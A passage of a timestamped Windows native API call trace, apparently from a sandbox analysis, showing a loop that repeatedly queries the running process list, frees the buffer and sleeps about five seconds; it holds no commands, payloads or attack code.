NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.815] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.816] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.816] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.816] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.818] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.819] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.831] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.831] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.831] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.832] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.834] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.834] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.846] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.847] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.847] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.848] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.848] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.850] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.851] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.863] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.864] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.864] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.864] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.865] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.867] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.867] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.877] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.878] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.878] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.878] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.881] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.881] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.893] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.894] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.894] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.895] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.896] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.897] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.921] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.922] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.922] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.922] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.923] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.926] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.926] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.940] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.940] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.941] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.941] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.941] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.942] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.943] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.955] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.956] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.956] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.956] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.958] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.959] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.972] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.972] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.973] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.973] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.973] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.975] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.976] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0144.987] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0144.987] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0144.988] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0144.988] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0144.988] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0144.990] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0144.991] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.006] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.006] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.006] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.007] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.007] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.009] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.009] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.018] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.018] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.018] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.019] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.019] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.021] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.021] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.034] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.034] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.035] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.035] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.035] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.037] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.037] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.049] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.049] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.050] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.050] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.050] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.052] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.052] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.067] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.067] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.067] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.068] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.068] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.070] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.070] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.081] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.083] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.084] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.111] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.111] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.112] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.112] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.114] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.115] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.127] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.127] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.128] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.130] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.131] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.143] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.143] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.144] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.144] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.144] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.146] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.158] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0145.159] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0145.159] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0145.159] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0145.161] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0145.162] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0145.174] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0145.174] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, 